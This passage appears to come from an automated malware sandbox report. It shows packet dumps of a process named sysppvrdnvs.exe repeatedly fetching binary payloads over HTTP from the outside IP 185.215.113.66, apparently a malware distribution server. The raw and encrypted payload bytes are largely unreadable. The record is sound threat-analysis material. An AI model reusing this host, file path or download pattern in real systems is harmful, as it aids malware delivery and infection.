                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654180050 CEST112INData Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3
                                                                                                                                                                                                    Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654285908 CEST1236INData Raw: df 50 5e 7f 28 4b 33 04 b4 3a a9 20 79 58 ed e3 8d 4d 5e 67 51 44 02 be a3 81 02 86 c9 f0 14 35 97 13 d9 96 cd e0 8c 35 1e b0 21 48 c2 e1 c2 46 e2 3f 1f af 7d 27 2b bf d5 57 0d 78 72 8d 70 c8 38 de 55 5f 48 89 81 a8 19 d0 bc 93 4b 5c e0 ff b8 c2
                                                                                                                                                                                                    Data Ascii: P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ)|Rai>&y+eu BUHj{y0mlU"3S+I)~5DX#o&n3_$by<DLy/9o-T&ge1c80G~q!&
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654299974 CEST1236INData Raw: 0c 17 99 f2 dc 4c 43 4c 1b 74 a4 2e 3b 7f 13 7b 31 10 68 ce 33 5d c9 ef c7 81 17 80 74 c1 fc 96 e6 99 a0 cf 08 de f9 ef c7 af b3 99 89 2e b0 c0 b8 e1 91 45 69 65 c0 5c 3f 1f 96 c7 05 7c c3 36 20 3a d9 99 20 a3 04 33 c0 2b cd 06 60 f3 53 fd 82 9c
                                                                                                                                                                                                    Data Ascii: LCLt.;{1h3]t.Eie\?|6 : 3+`Se0L#}tK1(*ss|@a$@bWEgU4LlLAq5;z#@M8id8[y7*pZN$S<[Z88Al5r6^9Cko+
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654313087 CEST1236INData Raw: 2c c0 09 b2 53 27 5c 5f 4b 92 e5 70 d1 58 a1 7e 68 f0 f8 2d 01 0b ae f2 ef 1d fd 76 3e 43 44 79 12 e8 03 d8 c6 49 d5 28 b9 14 42 6b 25 e2 aa ea b4 fb 50 1e bd 72 08 e3 be 09 fc 52 71 27 3f 1a 20 cd ab 85 b8 04 a4 b9 8a 0a 97 92 1d 0a c1 e5 9f d3
                                                                                                                                                                                                    Data Ascii: ,S'\_KpX~h-v>CDyI(Bk%PrRq'? OZ,0+F_p4$8ce5\JA|MZz,J-ZoUS-,T`i?`xqc[)2~pHTV 6RCju.,jA
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654371023 CEST1236INData Raw: 70 7b bc f5 b5 3b dc 79 f2 61 41 e6 ae 67 58 ff 70 b0 e5 cb 23 20 e0 db 7f fa 3f 12 a7 b3 ab 9c b1 b0 7d d7 30 5f e3 1f 4c 49 ba 61 d9 ff c5 7b 13 b3 67 32 03 8a 4d b2 4c 32 29 a2 9b ae 38 f4 33 e5 76 c7 16 e4 5a e9 e9 58 3b 0d be 8c 7f fb 2a 4d
                                                                                                                                                                                                    Data Ascii: p{;yaAgXp# ?}0_LIa{g2ML2)83vZX;*M#>}df(gz;OE\wd(afrc@(Q0BJ*G2^{3k{$?imUMrbd<58qqH!]C'L l~FseDp?X7
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654383898 CEST1236INData Raw: 63 34 fc c6 c6 48 5c d3 fa cd e0 9b f9 6c 0b 41 9e aa 09 76 cf 23 4e 60 27 cb f4 36 5a 5c 53 c7 11 93 42 4a 91 a7 00 c1 21 72 e2 97 f5 56 32 30 53 7b 88 7d cf 72 eb 02 1a 4c 1e ad 0a 8e 64 a4 61 ef cc e7 c7 64 2b 30 12 68 bd 09 18 7f e5 a2 82 1f
                                                                                                                                                                                                    Data Ascii: c4H\lAv#N`'6Z\SBJ!rV20S{}rLdad+0hFaGv:;]ud8[H9PCE=YdC//7Mo:_[nU4&-+T3U,%S!&C+?0p[}f*5&hj5[@B
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654393911 CEST760INData Raw: e6 25 10 eb dc 08 9e e7 84 59 37 6d cc 79 9e 9a 65 cf 09 1a b4 58 e2 7a b1 b6 89 0b 4f c8 c2 87 f1 ad 57 30 93 da d9 82 b3 f1 37 ab c7 d4 11 c9 c6 db 35 28 e3 7f 80 92 24 51 90 a6 b4 cd c0 80 0d 3f 6f 09 1d d6 58 1a 43 28 b7 fe 4a 8c d7 37 20 a5
                                                                                                                                                                                                    Data Ascii: %Y7myeXzOW075($Q?oXC(J7 L!Ce\_GMSqM#&@_(8@0<XHQu?98kir&[QMry'6YUk8G['kY.@?i3t&Mk
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654407024 CEST1236INData Raw: ab 02 4f b7 77 b8 d6 61 8c 11 cc 35 fe dd fa 9c b3 17 68 68 79 58 d6 91 26 cb cf cc ff bc 31 bd d3 10 2f e7 12 fb 76 06 2e ea b6 26 10 d4 f3 20 fe 37 f6 ff 94 8c ba 34 7d 80 44 10 e4 dc e2 fa 7e bc 22 bd 92 c3 af ae 7d d5 f4 d6 2d 54 ac a6 4e 03
                                                                                                                                                                                                    Data Ascii: Owa5hhyX&1/v.& 74}D~"}-TN.`"=aUNoPpy@U$f^{q[BHQ:>:v<DmA[M=NHI"={`!a}j&C'Xe^X.t~>,lmhPA~FE
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654463053 CEST1236INData Raw: ab 7d 9c ac c4 aa 17 1d 59 5a 32 3a b1 48 b2 25 c1 ba 3e 25 fb b4 69 81 ab bd 29 75 ad b7 45 ea 4c e5 76 80 3b fa ec 7c 6f 7c 12 70 36 2d 91 1c 84 79 29 65 62 2a 42 9f 21 88 a8 e5 70 d0 fd 3b 67 61 4f 29 89 ec 5b 34 2e 01 91 1a 92 89 57 ab 91 7b
                                                                                                                                                                                                    Data Ascii: }YZ2:H%>%i)uELv;|o|p6-y)eb*B!p;gaO)[4.W{6R,+*Yq3QqTS7d$6n^ ouj~0XvA$Eq<B7\#!``g~{(>i]D5n6EVl;7VtOl[c
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.659605980 CEST1236INData Raw: b5 93 98 79 2e 09 cd 11 59 84 3d 04 a7 f1 c0 a4 3b 1e 22 b5 76 35 21 a8 3d ea 56 08 b8 ef 53 61 0d 1f 5d 2b 7f 33 16 8e 38 8e 34 bb 28 13 f4 8f c0 71 68 6b f4 63 25 63 92 07 2d e0 e6 37 fa 70 30 e3 b4 00 51 cb 2e 37 b8 23 41 8d e8 05 91 e7 fa 39
                                                                                                                                                                                                    Data Ascii: y.Y=;"v5!=VSa]+384(qhkc%c-7p0Q.7#A9<U3NW4:0T]Gl_Ht&:UP}u|C_/S0'n!C??&ol@ &d'C(!S"EYDXW`IN6Z-C%"


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    3192.168.2.849714185.215.113.6680760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:26:45.460767984 CEST166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:46.377564907 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:26:46 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 8960
                                                                                                                                                                                                    Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "671230ee-2300"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                                                                                                    Oct 26, 2024 07:26:46.377583027 CEST212INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                                                                                                    Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eG
                                                                                                                                                                                                    Oct 26, 2024 07:26:46.377605915 CEST1236INData Raw: 92 a1 63 bb 11 a3 a6 6f b8 dc 84 ab 25 d4 d7 b9 13 62 41 3b 9b bd 30 3d bd 58 10 df 5e f2 14 fa 74 89 69 85 49 e5 8e 49 73 dc e1 a2 ff 6e fb d0 8c f3 c2 63 3a 9b a2 b5 46 26 c1 6c 55 27 18 0a 2f dc 78 db 9f 1e 4a c5 c7 51 e0 87 48 ee 49 39 78 8c
                                                                                                                                                                                                    Data Ascii: co%bA;0=X^tiIIsnc:F&lU'/xJQHI9xJ :6A@dq"0o3zC4/mqM#~EiuIzG4B9+9|$mYlwF"`D^>FDO'QC~@}kJ#_<+
                                                                                                                                                                                                    Oct 26, 2024 07:26:46.377624035 CEST1236INData Raw: ee de b1 15 d7 2e 70 a7 00 cd a2 2f ed 7b 68 96 70 27 53 53 9a 1b 2f 04 c5 95 67 29 ea ff 57 4a 34 8c f7 15 08 29 60 c4 16 0a 86 01 d5 26 11 61 aa 30 6f e5 63 5d 55 ce 8f 9e 01 ae 06 6f cd a4 81 11 1a 80 ad f8 28 99 34 e6 4d 27 5f fd 73 a1 d4 47
                                                                                                                                                                                                    Data Ascii: .p/{hp'SS/g)WJ4)`&a0oc]Uo(4M'_sG@mxy6("S9%5]9[h1_&},fOnNH*c>/:I(+_a[;Q|~E|$e|B#IynhJ|k;OT
                                                                                                                                                                                                    Oct 26, 2024 07:26:46.377636909 CEST124INData Raw: ed 9b 03 4e 13 e2 90 de 9a 2f 36 00 ed 89 0f 1d 70 c3 22 5d 63 b8 7b 8e bb 31 ff 20 c2 c2 4e c8 0c ae f0 b5 bd dc 54 cf 9d d8 9b 53 fb f5 07 06 08 67 41 37 d6 7c 17 9d 1c 49 93 f0 9b 93 f1 d6 d6 b6 35 59 e7 26 68 4f 8e 68 9b f3 41 c9 f3 1b fb 08
                                                                                                                                                                                                    Data Ascii: N/6p"]c{1 NTSgA7|I5Y&hOhAcUz(S7S})!s%F'GWfS\D
                                                                                                                                                                                                    Oct 26, 2024 07:26:46.377652884 CEST1236INData Raw: 35 91 9b c1 14 4c d0 91 fe aa bd 52 c5 29 72 9d e3 bc 39 de cd a5 b4 b1 58 e9 96 a3 2b 25 d0 11 07 be f8 ed 89 71 be 79 12 82 18 46 ac a6 88 ba 3d 5a 96 af 3f a5 ef 1f e9 da 21 18 33 69 f5 e3 08 b7 9c 52 4d 92 10 87 70 e8 6c 0e e9 14 c4 c1 93 a8
                                                                                                                                                                                                    Data Ascii: 5LR)r9X+%qyF=Z?!3iRMpl/BrlB7-*Yt;|rS{.gdfow%f.tBH{:Ba{%dPL(Q6V>m:p@Nx!I EKJ*{s`#U
                                                                                                                                                                                                    Oct 26, 2024 07:26:46.377667904 CEST212INData Raw: 33 10 82 8d 90 54 9e bb 7c c3 87 86 d3 12 55 e8 4a 8a 16 82 0c 91 2e b8 d1 1d bb bf dc e7 4c f3 af 8e cf 43 b8 f9 77 31 77 35 65 64 c5 bb ba 51 07 10 a4 ce 44 d9 db b7 71 e2 b5 48 ee fa 05 91 3d 1b c9 c6 91 2e ff f0 a9 7e 6f 84 73 ba 58 6f e7 75
                                                                                                                                                                                                    Data Ascii: 3T|UJ.LCw1w5edQDqH=.~osXouHePdtnq`Y6G4@4G"EL*-D$hOYCMt;Eby;tQfqV{#btFGqNPs%#@
                                                                                                                                                                                                    Oct 26, 2024 07:26:46.377681017 CEST1236INData Raw: 23 26 41 95 d6 f4 47 d6 20 3d bc 4f 50 9f 70 c8 2a ca bb 9f 75 04 ec 4c 78 e9 cd 21 24 bf 41 c9 3c 1f 02 0d 0c 6b 5f 78 8c 6d 80 4f c4 9c 10 d7 a7 16 ed e8 db 31 d2 3e b4 8d 06 f3 89 82 e0 00 18 10 e6 b1 b2 76 dd 0c 87 c7 fc d5 16 40 07 cc 0c 4f
                                                                                                                                                                                                    Data Ascii: #&AG =OPp*uLx!$A<k_xmO1>v@O;KbSs YUN7L'A4Ht\isoh-%a~4A7n7C;0PQCgkwNz8NMxAbZYPU4]&^eqDuTbF8
                                                                                                                                                                                                    Oct 26, 2024 07:26:46.377695084 CEST212INData Raw: 2b c3 59 1d 8c 11 5f 25 7d e2 e2 9a 61 a8 5c 77 5f af ad 72 90 61 0a a4 3d fa a9 ad 0c e2 cb 4e 2e f3 97 1d 3e 65 ad 91 95 40 06 62 cf cd fa a2 e9 92 23 9a 54 5c df fb 40 41 24 e3 46 4d 16 2e 80 31 0d 21 e9 46 fb 57 79 e0 10 dc 1e 09 05 37 4a 4b
                                                                                                                                                                                                    Data Ascii: +Y_%}a\w_ra=N.>e@b#T\@A$FM.1!FWy7JKPh,2W>>{]t4iUaAIdBJ+:O"F7&Vn#Rj*$.z"Wt,qNh"1=3Ib:Y!\fs
                                                                                                                                                                                                    Oct 26, 2024 07:26:46.377711058 CEST1236INData Raw: e8 41 e9 46 88 29 2c d0 af 9c 6c 3b f5 6d 4e bd f9 7c b7 23 7b cb b1 f8 96 d8 53 fe 3f be 96 26 50 3c 47 35 49 6a a2 8d e5 eb f1 be b1 59 c1 57 59 3e bf 71 9c e0 2b b6 a7 db 66 8e 4c 7e a3 89 9f d8 7f 57 d1 12 9b 88 35 9c 47 58 50 b1 15 e3 ad 81
                                                                                                                                                                                                    Data Ascii: AF),l;mN|#{S?&P<G5IjYWY>q+fL~W5GXPY?ECjZ@=:pj|KYD$~$nb"}rRu{5J@LY{\eY d8`}$@[b V;)WD1)%
                                                                                                                                                                                                    Oct 26, 2024 07:26:46.383588076 CEST1048INData Raw: 6b f9 d6 65 d0 df f9 26 75 2b 62 0d a1 d9 0d 49 d6 42 dd 60 15 da d4 ac 1b cb a2 db 9a 23 a2 a9 bc 30 73 1b 27 ac 5d a1 f6 8b 14 c2 0e 0f f5 42 18 a3 f1 17 e9 34 cc 2f c2 81 9d a2 10 8b 06 38 16 3e d6 09 12 90 e2 58 81 d1 01 75 e4 d0 50 cc b3 83
                                                                                                                                                                                                    Data Ascii: ke&u+bIB`#0s']B4/8>XuP_Q@(^OS$&?Jl[e:s8Mf?QCxCzUw%tMoueUiQerj1F\FC1qIfbh\I.Xj[R)^


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    4192.168.2.858707185.215.113.6680760C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Oct 26, 2024 07:26:47.402076006 CEST166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:48.594955921 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:26:48 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 8960
                                                                                                                                                                                                    Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "671230ee-2300"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                                                                                                    Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                                                                                                    Oct 26, 2024 07:26:48.595019102 CEST212INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                                                                                                    Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eG
                                                                                                                                                                                                    Oct 26, 2024 07:26:48.595035076 CEST1236INData Raw: 92 a1 63 bb 11 a3 a6 6f b8 dc 84 ab 25 d4 d7 b9 13 62 41 3b 9b bd 30 3d bd 58 10 df 5e f2 14 fa 74 89 69 85 49 e5 8e 49 73 dc e1 a2 ff 6e fb d0 8c f3 c2 63 3a 9b a2 b5 46 26 c1 6c 55 27 18 0a 2f dc 78 db 9f 1e 4a c5 c7 51 e0 87 48 ee 49 39 78 8c
                                                                                                                                                                                                    Data Ascii: co%bA;0=X^tiIIsnc:F&lU'/xJQHI9xJ :6A@dq"0o3zC4/mqM#~EiuIzG4B9+9|$mYlwF"`D^>FDO'QC~@}kJ#_<+
                                                                                                                                                                                                    Oct 26, 2024 07:26:48.595052958 CEST1236INData Raw: ee de b1 15 d7 2e 70 a7 00 cd a2 2f ed 7b 68 96 70 27 53 53 9a 1b 2f 04 c5 95 67 29 ea ff 57 4a 34 8c f7 15 08 29 60 c4 16 0a 86 01 d5 26 11 61 aa 30 6f e5 63 5d 55 ce 8f 9e 01 ae 06 6f cd a4 81 11 1a 80 ad f8 28 99 34 e6 4d 27 5f fd 73 a1 d4 47
                                                                                                                                                                                                    Data Ascii: .p/{hp'SS/g)WJ4)`&a0oc]Uo(4M'_sG@mxy6("S9%5]9[h1_&},fOnNH*c>/:I(+_a[;Q|~E|$e|B#IynhJ|k;OT
                                                                                                                                                                                                    Oct 26, 2024 07:26:48.595077991 CEST1236INData Raw: ed 9b 03 4e 13 e2 90 de 9a 2f 36 00 ed 89 0f 1d 70 c3 22 5d 63 b8 7b 8e bb 31 ff 20 c2 c2 4e c8 0c ae f0 b5 bd dc 54 cf 9d d8 9b 53 fb f5 07 06 08 67 41 37 d6 7c 17 9d 1c 49 93 f0 9b 93 f1 d6 d6 b6 35 59 e7 26 68 4f 8e 68 9b f3 41 c9 f3 1b fb 08
                                                                                                                                                                                                    Data Ascii: N/6p"]c{1 NTSgA7|I5Y&hOhAcUz(S7S})!s%F'GWfS\D5LR)r9X+%qyF=Z?!3iRMpl/BrlB7-*Yt;|rS{.
                                                                                                                                                                                                    Oct 26, 2024 07:26:48.595093966 CEST1236INData Raw: 4f bc 9d 1b 44 49 75 e6 8c b1 e7 9f 92 d9 48 d7 d6 22 6f e8 52 5e 6b df 05 3d 96 84 25 f1 c2 53 c3 89 f5 5c 28 92 91 8d 4c 82 37 17 51 52 80 45 55 36 3d bb 6f 91 4e a3 4c 85 11 98 20 9a 7c 7e 9f b6 9a 10 d5 bb 97 e8 3b da 76 02 46 aa 7c ca f7 af
                                                                                                                                                                                                    Data Ascii: ODIuH"oR^k=%S\(L7QREU6=oNL |~;vF|5qOh[IO*9%i0q~3T|UJ.LCw1w5edQDqH=.~osXouHePdtnq`Y6G4@4G"EL*
                                                                                                                                                                                                    Oct 26, 2024 07:26:48.595113993 CEST1236INData Raw: 88 c2 b3 51 d1 ac dc f2 5c bf fc 9e c1 8b 99 c1 0a d8 2d 23 36 eb 6e 70 97 80 63 ff 60 04 a9 02 af ed 44 6b 10 d4 6f 10 41 bc 0a aa 9b 73 35 96 89 2e d3 aa 35 09 c4 db 3e 8e f6 b7 5a 6a 37 41 c3 f8 42 ad 8e 0f 95 5f d2 88 cc 2b 3e c1 89 0b a2 c7
                                                                                                                                                                                                    Data Ascii: Q\-#6npc`DkoAs5.5>Zj7AB_+>0~$mN}_x&p;=alp >ix2U([|Ru>qOoOa/`u0`]~6lgMhwROak:%xN;Y]DiI
                                                                                                                                                                                                    Oct 26, 2024 07:26:48.595132113 CEST1236INData Raw: 32 37 7d 84 b9 23 68 48 3f 46 de 44 dd 02 72 c6 32 45 af c3 83 79 23 ef e7 09 f5 bd 73 ce f7 ce db 57 5a da a4 2b 42 cd ee 43 2a 84 7d b5 28 57 49 e3 29 87 6a 7a 64 e5 db 83 d9 8c 2a 16 a4 73 71 07 90 a1 0f 4c bf 13 b8 30 80 7d 6c 6d bc 46 d5 2d
                                                                                                                                                                                                    Data Ascii: 27}#hH?FDr2Ey#sWZ+BC*}(WI)jzd*sqL0}lmF-pd2+raZm8zq,!~V0:eUI7"[0>|u+bpthnqi/frALB?mWAE05E
                                                                                                                                                                                                    Oct 26, 2024 07:26:48.595177889 CEST360INData Raw: bc df 41 63 9e db ed 92 30 09 ad de 25 47 08 a2 bc 09 f7 68 05 f2 97 47 63 f9 69 06 1f 2c 67 1b 49 99 7f 5c b0 fd 26 3c 26 9d 73 0c b2 b3 c1 51 8c 10 c3 70 bf c7 63 e5 2c 7d 17 4b b8 c6 1e 46 ae 7a 23 b2 3b 3f 98 d9 c7 de 3a ed 65 f9 65 10 f2 cd
                                                                                                                                                                                                    Data Ascii: Ac0%GhGci,gI\&<&sQpc,}KFz#;?:ee.D3<8>wI]0i}-F0Y`"0W5Ayj6V).|ENbat2');Ca]9:9C'/;/@QF6aa(KJ[ZgUP\+Lzx
                                                                                                                                                                                                    Oct 26, 2024 07:26:54.726517916 CEST166OUTGET /3 HTTP/1.1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                    Host: 185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:55.044763088 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                    Date: Sat, 26 Oct 2024 05:26:54 GMT
                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                    Content-Length: 16128
                                                                                                                                                                                                    Last-Modified: Wed, 25 Sep 2024 06:10:59 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "66f3a973-3f00"
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: aa ff 5b 85 19 de 79 93 4d ba ae a5 78 a9 fd 33 2b 5f 5b 98 2f e2 90 9b 43 bd 1a 0d 04 b2 f0 0d e0 d2 4c b9 c7 49 cc d7 d9 86 fc 8a cb a9 8a a3 e8 4b 30 70 cc 50 61 19 a3 47 82 6a 87 71 cd 8c 0c 72 ae da 3e dd b2 2b 22 4d d7 28 a6 af 1c bc 29 de 1c 02 e5 f1 a6 6e 66 9e dd 18 a8 da 2b ff 6d c4 8d ee fd 38 60 ba e4 86 f4 d7 40 df 27 56 a7 f2 ca 5d 5f fa 84 aa 7b cf 31 80 26 84 f3 f2 df d5 e9 24 ed 82 c6 22 c1 fd cf 14 bb 4c 2b d9 27 6c f4 35 00 10 82 a6 1e bb 1d cf 5d 31 5a dd 21 48 df 7c c6 bd aa 01 4a af 21 b4 2f b4 3d 3a 6a 72 7e ad 32 ca d0 54 ff fa 5e 52 a6 ae 21 74 90 74 88 9f 33 25 5f 1c 2f 3a cd 70 f4 a3 40 f4 de 5a 2d 2e a5 ab 8c c7 c4 39 ee ac 1f df dd ad 83 61 53 40 96 ef 54 f8 d5 99 78 d0 5c 15 a6 e4 3a 94 aa 88 b5 29 9f 27 fe df f6 f1 44 8d bc dd e1 03 41 86 b3 e3 55 74 f6 93 e0 52 2d 67 f4 5a 3e ac f1 42 1d 05 88 0b c7 71 98 35 3a 39 b0 14 2a a2 79 0b 6e 7a ab 34 d0 5e f3 c0 be 79 a1 6e 92 b2 77 e0 36 5f b2 e6 fd 89 91 4d 37 1c 32 b3 ee 70 af 6a 4a 74 8a 23 65 0e 7a c7 53 57 d8 80 68 b7 [TRUNCATED]
